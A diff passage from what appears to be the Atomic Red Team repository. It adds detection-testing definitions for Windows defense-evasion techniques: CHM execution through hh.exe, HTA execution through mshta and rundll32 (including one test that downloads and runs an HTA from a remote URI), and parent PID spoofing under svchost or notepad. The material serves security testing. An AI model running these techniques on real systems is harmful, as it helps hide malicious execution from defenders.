+ auto_generated_guid: 4f83adda-f5ec-406d-b318-9773c9ca92e5 + description: Executes a CHM file with a defined script engine, ITS Protocol + Handler, and help topic extension. + supported_platforms: + - windows + input_arguments: + topic_extension: + description: Default Help Topic + type: string + default: html + hh_file_path: + description: path of modified HH.exe + type: path + default: "$env:windir\\hh.exe" + infotech_storage_handler: + description: Default InfoTech Storage Protocol Handler + type: string + default: its + script_engine: + description: Default Script Engine + type: string + default: JScript + chm_file_path: + description: Default path of CHM + type: string + default: Test.chm + dependencies: + - description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp + must be exported in the module. + prereq_command: |- + $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable + if (-not $RequiredModule) {exit 1} + if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0} + get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser + -Force + +' + executor: + command: 'Invoke-ATHCompiledHelp -ScriptEngine #{script_engine} -InfoTechStorageHandler + #{infotech_storage_handler} -TopicExtension #{topic_extension} -HHFilePath + #{hh_file_path} -CHMFilePath #{chm_file_path}' + name: powershell + - name: Invoke CHM Shortcut Command with ITS and Help Topic + auto_generated_guid: 15756147-7470-4a83-87fb-bb5662526247 + description: Executes a CHM file using the Shortcut Command method with a defined + ITS Protocol Handler, and help topic extension. + supported_platforms: + - windows + input_arguments: + topic_extension: + description: Default Help Topic + type: string + default: html + hh_file_path: + description: path of modified HH.exe + type: path + default: "$env:windir\\hh.exe" + infotech_storage_handler: + description: Default InfoTech Storage Protocol Handler + type: string + default: its + chm_file_path: + description: Default path of CHM + type: string + default: Test.chm + dependencies: + - description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp + must be exported in the module. + prereq_command: |- + $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable + if (-not $RequiredModule) {exit 1} + if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0} + get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser + -Force + +' + executor: + command: 'Invoke-ATHCompiledHelp -ExecuteShortcutCommand -InfoTechStorageHandler + #{infotech_storage_handler} -TopicExtension #{topic_extension} -HHFilePath + #{hh_file_path} -CHMFilePath #{chm_file_path}' + name: powershell T1542.002: technique: external_references: @@ -28845,6 +29141,196 @@ defense-evasion: ' name: powershell + - name: Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral + Movement + auto_generated_guid: 007e5672-2088-4853-a562-7490ddc19447 + description: Executes an HTA Application using JScript script engine using local + UNC path simulating lateral movement. + supported_platforms: + - windows + input_arguments: + script_engine: + description: Script Engine to use + type: string + default: JScript + hta_file_path: + description: HTA file name and or path to be used + type: string + default: Test.hta + mshta_file_path: + description: Location of mshta.exe + type: string + default: "$env:windir\\system32\\mshta.exe" + dependencies: + - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication + must be exported in the module. + prereq_command: |- + $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable + if (-not $RequiredModule) {exit 1} + if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0} + get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser + -Force + +' + executor: + command: 'Invoke-ATHHTMLApplication -HTAFilePath #{hta_file_path} -ScriptEngine + #{script_engine} -AsLocalUNCPath -SimulateLateralMovement -MSHTAFilePath + #{mshta_file_path}' + name: powershell + - name: Invoke HTML Application - Jscript Engine Simulating Double Click + auto_generated_guid: 58a193ec-131b-404e-b1ca-b35cf0b18c33 + description: Executes an HTA Application using JScript script engine simulating + double click. + supported_platforms: + - windows + input_arguments: + script_engine: + description: Script Engine to use + type: string + default: JScript + hta_file_path: + description: HTA file name and or path to be used + type: string + default: Test.hta + dependencies: + - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication + must be exported in the module. + prereq_command: |- + $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable + if (-not $RequiredModule) {exit 1} + if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0} + get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser + -Force + +' + executor: + command: 'Invoke-ATHHTMLApplication -HTAFilePath #{hta_file_path} -ScriptEngine + #{script_engine} -SimulateUserDoubleClick' + name: powershell + - name: Invoke HTML Application - Direct download from URI + auto_generated_guid: 39ceed55-f653-48ac-bd19-aceceaf525db + description: Executes an HTA Application by directly downloading from remote + URI. + supported_platforms: + - windows + input_arguments: + mshta_file_path: + description: Location of mshta.exe + type: string + default: "$env:windir\\system32\\mshta.exe" + hta_uri: + description: URI to HTA + type: string + default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/24549e3866407c3080b95b6afebf78e8acd23352/atomics/T1218.005/src/T1218.005.hta + dependencies: + - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication + must be exported in the module. + prereq_command: |- + $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable + if (-not $RequiredModule) {exit 1} + if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0} + get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser + -Force + +' + executor: + command: 'Invoke-ATHHTMLApplication -HTAUri #{hta_uri} -MSHTAFilePath #{mshta_file_path}' + name: powershell + - name: Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol + Handler + auto_generated_guid: e7e3a525-7612-4d68-a5d3-c4649181b8af + description: Executes an HTA Application with JScript Engine, Rundll32 and Inline + Protocol Handler. + supported_platforms: + - windows + input_arguments: + rundll32_file_path: + description: Location of rundll32.exe + type: string + default: "$env:windir\\system32\\rundll32.exe" + script_engine: + description: Script Engine to use + type: string + default: JScript + protocol_handler: + description: Protocol Handler to use + type: string + default: About + dependencies: + - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication + must be exported in the module. + prereq_command: |- + $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable + if (-not $RequiredModule) {exit 1} + if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0} + get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser + -Force + +' + executor: + command: 'Invoke-ATHHTMLApplication -ScriptEngine #{script_engine} -InlineProtocolHandler + #{protocol_handler} -UseRundll32 -Rundll32FilePath #{rundll32_file_path}' + name: powershell + - name: Invoke HTML Application - JScript Engine with Inline Protocol Handler + auto_generated_guid: d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840 + description: Executes an HTA Application with JScript Engine and Inline Protocol + Handler. + supported_platforms: + - windows + input_arguments: + mshta_file_path: + description: Location of mshta.exe + type: string + default: "$env:windir\\system32\\mshta.exe" + script_engine: + description: Script Engine to use + type: string + default: JScript + protocol_handler: + description: Protocol Handler to use + type: string + default: About + dependencies: + - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication + must be exported in the module. + prereq_command: |- + $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable + if (-not $RequiredModule) {exit 1} + if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0} + get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser + -Force + +' + executor: + command: 'Invoke-ATHHTMLApplication -ScriptEngine #{script_engine} -InlineProtocolHandler + #{protocol_handler} -MSHTAFilePath #{mshta_file_path}' + name: powershell + - name: Invoke HTML Application - Simulate Lateral Movement over UNC Path + auto_generated_guid: b8a8bdb2-7eae-490d-8251-d5e0295b2362 + description: Executes an HTA Application with Simulate lateral movement over + UNC Path. + supported_platforms: + - windows + input_arguments: + mshta_file_path: + description: Location of mshta.exe + type: string + default: "$env:windir\\system32\\mshta.exe" + dependencies: + - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication + must be exported in the module. + prereq_command: |- + $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable + if (-not $RequiredModule) {exit 1} + if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0} + get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser + -Force + +' + executor: + command: 'Invoke-ATHHTMLApplication -TemplatePE -AsLocalUNCPath -MSHTAFilePath + #{mshta_file_path}' + name: powershell T1218.007: technique: created: '2020-01-24T14:38:49.266Z' @@ -29744,6 +30230,134 @@ defense-evasion: Stop-Process -Name "#{dll_process_name}" -ErrorAction Ignore Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore name: powershell + - name: Parent PID Spoofing - Spawn from Current Process + auto_generated_guid: 14920ebd-1d61-491a-85e0-fe98efe37f25 + description: Spawns a powershell.exe process as a child of the current process. + supported_platforms: + - windows + input_arguments: + file_path: + description: File path or name of process to spawn + type: path + default: "$Env:windir\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" + parent_pid: + description: PID of process to spawn from + type: string + default: "$PID" + command_line: + description: Specified command line to use + type: string + default: "-Command Start-Sleep 10" + dependencies: + - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent + must be exported in the module. + prereq_command: |- + $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable + if (-not $RequiredModule) {exit 1} + if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} + get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser + -Force + +' + executor: + command: 'Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine + ''#{command_line}'' -ParentId #{parent_pid}' + name: powershell + - name: Parent PID Spoofing - Spawn from Specified Process + auto_generated_guid: cbbff285-9051-444a-9d17-c07cd2d230eb + description: Spawns a notepad.exe process as a child of the current process. + supported_platforms: + - windows + input_arguments: + parent_pid: + description: PID of process to spawn from + type: string + default: "$PID" + test_guid: + description: Defined test GUID + type: string + default: 12345678-1234-1234-1234-123456789123 + dependencies: + - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent + must be exported in the module. + prereq_command: |- + $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable + if (-not $RequiredModule) {exit 1} + if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} + get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser + -Force + +' + executor: + command: 'Start-ATHProcessUnderSpecificParent -ParentId #{parent_pid} -TestGuid + #{test_guid}' + name: powershell + - name: Parent PID Spoofing - Spawn from svchost.exe + auto_generated_guid: e9f2b777-3123-430b-805d-5cedc66ab591 + description: Spawnd a process as a child of the first accessible svchost.exe + process. + supported_platforms: + - windows + input_arguments: + command_line: + description: Specified command line to use + type: string + default: "-Command Start-Sleep 10" + file_path: + description: File path or name of process to spawn + type: path + default: "$Env:windir\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" + dependencies: + - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent + must be exported in the module. + prereq_command: |- + $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable + if (-not $RequiredModule) {exit 1} + if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} + get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser + -Force + +' + executor: + command: 'Get-CimInstance -ClassName Win32_Process -Property Name, CommandLine, + ProcessId -Filter "Name = ''svchost.exe'' AND CommandLine LIKE ''%''" | + Select-Object -First 1 | Start-ATHProcessUnderSpecificParent -FilePath #{file_path} + -CommandLine ''#{command_line}''' + name: powershell + - name: Parent PID Spoofing - Spawn from New Process + auto_generated_guid: 2988133e-561c-4e42-a15f-6281e6a9b2db + description: Creates a notepad.exe process and then spawns a powershell.exe + process as a child of it. + supported_platforms: + - windows + input_arguments: + command_line: + description: Specified command line to use + type: string + default: "-Command Start-Sleep 10" + file_path: + description: File path or name of process to spawn + type: path + default: "$Env:windir\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" + parent_name: + description: Parent process to spoof from + type: path + default: "$Env:windir\\System32\\notepad.exe" + dependencies: + - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent + must be exported in the module. + prereq_command: |- + $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable + if (-not $RequiredModule) {exit 1} + if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} + get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser + -Force + +' + executor: + command: 'Start-Process -FilePath #{parent_name} -PassThru | Start-ATHProcessUnderSpecificParent + -FilePath #{file_path} -CommandLine ''#{command_line}''' + name: powershell T1550.002: technique: external_references: diff --git a/atomics/T1134.004/T1134.004.md b/atomics/T1134.004/T1134.004.md index c764764d..4e26c477 100644 --- a/atomics/T1134.004/T1134.004.md +++ b/atomics/T1134.004/T1134.004.md @@ -10,6 +10,14 @@ Explicitly assigning the PPID may also enable elevated privileges given appropri - [Atomic Test #1 - Parent PID Spoofing using PowerShell](#atomic-test-1---parent-pid-spoofing-using-powershell) +- [Atomic Test #2 - Parent PID Spoofing - Spawn from Current Process](#atomic-test-2---parent-pid-spoofing---spawn-from-current-process) + +- [Atomic Test #3 - Parent PID Spoofing - Spawn from Specified Process](#atomic-test-3---parent-pid-spoofing---spawn-from-specified-process) + +- [Atomic Test #4 - Parent PID Spoofing - Spawn from svchost.exe](#atomic-test-4---parent-pid-spoofing---spawn-from-svchostexe) + +- [Atomic Test #5 - Parent PID Spoofing - Spawn from New Process](#atomic-test-5---parent-pid-spoofing---spawn-from-new-process) +
@@ -67,4 +75,182 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato +
+
+ +## Atomic Test #2 - Parent PID Spoofing - Spawn from Current Process +Spawns a powershell.exe process as a child of the current process. + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| file_path | File path or name of process to spawn | path | $Env:windir\System32\WindowsPowerShell\v1.0\powershell.exe| +| parent_pid | PID of process to spawn from | string | $PID| +| command_line | Specified command line to use | string | -Command Start-Sleep 10| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine '#{command_line}' -ParentId #{parent_pid} +``` + + + + +#### Dependencies: Run with `powershell`! +##### Description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent must be exported in the module. +##### Check Prereq Commands: +```powershell +$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable +if (-not $RequiredModule) {exit 1} +if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} +``` +##### Get Prereq Commands: +```powershell +Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force +``` + + + + +
+
+ +## Atomic Test #3 - Parent PID Spoofing - Spawn from Specified Process +Spawns a notepad.exe process as a child of the current process. + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| parent_pid | PID of process to spawn from | string | $PID| +| test_guid | Defined test GUID | string | 12345678-1234-1234-1234-123456789123| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +Start-ATHProcessUnderSpecificParent -ParentId #{parent_pid} -TestGuid #{test_guid} +``` + + + + +#### Dependencies: Run with `powershell`! +##### Description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent must be exported in the module. +##### Check Prereq Commands: +```powershell +$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable +if (-not $RequiredModule) {exit 1} +if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} +``` +##### Get Prereq Commands: +```powershell +Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force +``` + + + + +
+
+ +## Atomic Test #4 - Parent PID Spoofing - Spawn from svchost.exe +Spawnd a process as a child of the first accessible svchost.exe process. + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| command_line | Specified command line to use | string | -Command Start-Sleep 10| +| file_path | File path or name of process to spawn | path | $Env:windir\System32\WindowsPowerShell\v1.0\powershell.exe| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +Get-CimInstance -ClassName Win32_Process -Property Name, CommandLine, ProcessId -Filter "Name = 'svchost.exe' AND CommandLine LIKE '%'" | Select-Object -First 1 | Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine '#{command_line}' +``` + + + + +#### Dependencies: Run with `powershell`! +##### Description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent must be exported in the module. +##### Check Prereq Commands: +```powershell +$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable +if (-not $RequiredModule) {exit 1} +if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} +``` +##### Get Prereq Commands: +```powershell +Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force +``` + + + + +
+
+ +## Atomic Test #5 - Parent PID Spoofing - Spawn from New Process +Creates a notepad.exe process and then spawns a powershell.exe process as a child of it. + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| command_line | Specified command line to use | string | -Command Start-Sleep 10| +| file_path | File path or name of process to spawn | path | $Env:windir\System32\WindowsPowerShell\v1.0\powershell.exe| +| parent_name | Parent process to spoof from | path | $Env:windir\System32\notepad.exe| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +Start-Process -FilePath #{parent_name} -PassThru | Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine '#{command_line}' +``` + + + + +#### Dependencies: Run with `powershell`! +##### Description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent must be exported in the module. +##### Check Prereq Commands: +```powershell +$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable +if (-not $RequiredModule) {exit 1} +if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} +``` +##### Get Prereq Commands: +```powershell +Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force +``` + + + +
diff --git a/atomics/T1134.004/T1134.004.yaml b/atomics/T1134.004/T1134.004.yaml index 78af0ff1..f8d817d8 100644 --- a/atomics/T1134.004/T1134.004.yaml +++ b/atomics/T1134.004/T1134.004.yaml @@ -51,3 +51,114 @@ atomic_tests: Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore name: powershell +- name: Parent PID Spoofing - Spawn from Current Process + auto_generated_guid: 14920ebd-1d61-491a-85e0-fe98efe37f25 + description: Spawns a powershell.exe process as a child of the current process. + supported_platforms: + - windows + input_arguments: + file_path: + description: File path or name of process to spawn + type: path + default: $Env:windir\System32\WindowsPowerShell\v1.0\powershell.exe + parent_pid: + description: PID of process to spawn from + type: string + default: $PID + command_line: + description: Specified command line to use + type: string + default: -Command Start-Sleep 10 + dependencies: + - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent must be exported in the module. + prereq_command: |- + $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable + if (-not $RequiredModule) {exit 1} + if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} + get_prereq_command: | + Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force + executor: + command: "Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine '#{command_line}' -ParentId #{parent_pid}" + name: powershell + +- name: Parent PID Spoofing - Spawn from Specified Process + auto_generated_guid: cbbff285-9051-444a-9d17-c07cd2d230eb + description: Spawns a notepad.exe process as a child of the current process. + supported_platforms: + - windows + input_arguments: + parent_pid: + description: PID of process to spawn from + type: string + default: $PID + test_guid: + description: Defined test GUID + type: string + default: 12345678-1234-1234-1234-123456789123 + dependencies: + - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent must be exported in the module. + prereq_command: |- + $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable + if (-not $RequiredModule) {exit 1} + if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} + get_prereq_command: | + Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force + executor: + command: 'Start-ATHProcessUnderSpecificParent -ParentId #{parent_pid} -TestGuid #{test_guid}' + name: powershell + +- name: Parent PID Spoofing - Spawn from svchost.exe + auto_generated_guid: e9f2b777-3123-430b-805d-5cedc66ab591 + description: Spawnd a process as a child of the first accessible svchost.exe process. + supported_platforms: + - windows + input_arguments: + command_line: + description: Specified command line to use + type: string + default: -Command Start-Sleep 10 + file_path: + description: File path or name of process to spawn + type: path + default: $Env:windir\System32\WindowsPowerShell\v1.0\powershell.exe + dependencies: + - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent must be exported in the module. + prereq_command: |- + $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable + if (-not $RequiredModule) {exit 1} + if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} + get_prereq_command: | + Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force + executor: + command: "Get-CimInstance -ClassName Win32_Process -Property Name, CommandLine, ProcessId -Filter \"Name = 'svchost.exe' AND CommandLine LIKE '%'\" | Select-Object -First 1 | Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine '#{command_line}'" + name: powershell + +- name: Parent PID Spoofing - Spawn from New Process + auto_generated_guid: 2988133e-561c-4e42-a15f-6281e6a9b2db + description: Creates a notepad.exe process and then spawns a powershell.exe process as a child of it. + supported_platforms: + - windows + input_arguments: + command_line: + description: Specified command line to use + type: string + default: -Command Start-Sleep 10 + file_path: + description: File path or name of process to spawn + type: path + default: $Env:windir\System32\WindowsPowerShell\v1.0\powershell.exe + parent_name: + description: Parent process to spoof from + type: path + default: $Env:windir\System32\notepad.exe + dependencies: + - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent must be exported in the module. + prereq_command: |- + $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable + if (-not $RequiredModule) {exit 1} + if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} + get_prereq_command: | + Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force + executor: + command: "Start-Process -FilePath #{parent_name} -PassThru | Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine '#{command_line}'" + name: powershell \ No newline at end of file diff --git a/atomics/T1218.001/T1218.001.md b/atomics/T1218.001/T1218.001.md index dd94ab0a..ef702c12 100644 --- a/atomics/T1218.001/T1218.001.md +++ b/atomics/T1218.001/T1218.001.md @@ -10,6 +10,16 @@ A custom CHM file containing embedded payloads could be delivered to a victim th - [Atomic Test #2 - Compiled HTML Help Remote Payload](#atomic-test-2---compiled-html-help-remote-payload) +- [Atomic Test #3 - Invoke CHM with default Shortcut Command Execution](#atomic-test-3---invoke-chm-with-default-shortcut-command-execution) + +- [Atomic Test #4 - Invoke CHM with InfoTech Storage Protocol Handler](#atomic-test-4---invoke-chm-with-infotech-storage-protocol-handler) + +- [Atomic Test #5 - Invoke CHM Simulate Double click](#atomic-test-5---invoke-chm-simulate-double-click) + +- [Atomic Test #6 - Invoke CHM with Script Engine and Help Topic](#atomic-test-6---invoke-chm-with-script-engine-and-help-topic) + +- [Atomic Test #7 - Invoke CHM Shortcut Command with ITS and Help Topic](#atomic-test-7---invoke-chm-shortcut-command-with-its-and-help-topic) +
@@ -83,4 +93,229 @@ hh.exe #{remote_chm_file} +
+
+ +## Atomic Test #3 - Invoke CHM with default Shortcut Command Execution +Executes a CHM file with the default Shortcut Command method. + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| chm_file_path | Default path of CHM | string | Test.chm| +| hh_file_path | path of modified HH.exe | path | $env:windir\hh.exe| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +Invoke-ATHCompiledHelp -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path} +``` + + + + +#### Dependencies: Run with `powershell`! +##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module. +##### Check Prereq Commands: +```powershell +$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable +if (-not $RequiredModule) {exit 1} +if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0} +``` +##### Get Prereq Commands: +```powershell +Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force +``` + + + + +
+
+ +## Atomic Test #4 - Invoke CHM with InfoTech Storage Protocol Handler +Executes a CHM file with the ITS protocol handler. + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| hh_file_path | path of modified HH.exe | path | $env:windir\hh.exe| +| infotech_storage_handler | Default InfoTech Storage Protocol Handler | string | its| +| chm_file_path | Default path of CHM | string | Test.chm| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +Invoke-ATHCompiledHelp -InfoTechStorageHandler #{infotech_storage_handler} -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path} +``` + + + + +#### Dependencies: Run with `powershell`! +##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module. +##### Check Prereq Commands: +```powershell +$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable +if (-not $RequiredModule) {exit 1} +if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0} +``` +##### Get Prereq Commands: +```powershell +Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force +``` + + + + +
+
+ +## Atomic Test #5 - Invoke CHM Simulate Double click +Executes a CHM file simulating a user double click. + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| chm_file_path | Default path of CHM | string | Test.chm| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +Invoke-ATHCompiledHelp -SimulateUserDoubleClick -CHMFilePath #{chm_file_path} +``` + + + + +#### Dependencies: Run with `powershell`! +##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module. +##### Check Prereq Commands: +```powershell +$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable +if (-not $RequiredModule) {exit 1} +if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0} +``` +##### Get Prereq Commands: +```powershell +Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force +``` + + + + +
+
+ +## Atomic Test #6 - Invoke CHM with Script Engine and Help Topic +Executes a CHM file with a defined script engine, ITS Protocol Handler, and help topic extension. + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| topic_extension | Default Help Topic | string | html| +| hh_file_path | path of modified HH.exe | path | $env:windir\hh.exe| +| infotech_storage_handler | Default InfoTech Storage Protocol Handler | string | its| +| script_engine | Default Script Engine | string | JScript| +| chm_file_path | Default path of CHM | string | Test.chm| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +Invoke-ATHCompiledHelp -ScriptEngine #{script_engine} -InfoTechStorageHandler #{infotech_storage_handler} -TopicExtension #{topic_extension} -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path} +``` + + + + +#### Dependencies: Run with `powershell`! +##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module. +##### Check Prereq Commands: +```powershell +$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable +if (-not $RequiredModule) {exit 1} +if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0} +``` +##### Get Prereq Commands: +```powershell +Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force +``` + + + + +
+
+ +## Atomic Test #7 - Invoke CHM Shortcut Command with ITS and Help Topic +Executes a CHM file using the Shortcut Command method with a defined ITS Protocol Handler, and help topic extension. + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| topic_extension | Default Help Topic | string | html| +| hh_file_path | path of modified HH.exe | path | $env:windir\hh.exe| +| infotech_storage_handler | Default InfoTech Storage Protocol Handler | string | its| +| chm_file_path | Default path of CHM | string | Test.chm| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +Invoke-ATHCompiledHelp -ExecuteShortcutCommand -InfoTechStorageHandler #{infotech_storage_handler} -TopicExtension #{topic_extension} -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path} +``` + + + + +#### Dependencies: Run with `powershell`! +##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module. +##### Check Prereq Commands: +```powershell +$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable +if (-not $RequiredModule) {exit 1} +if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0} +``` +##### Get Prereq Commands: +```powershell +Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force +``` + + + +
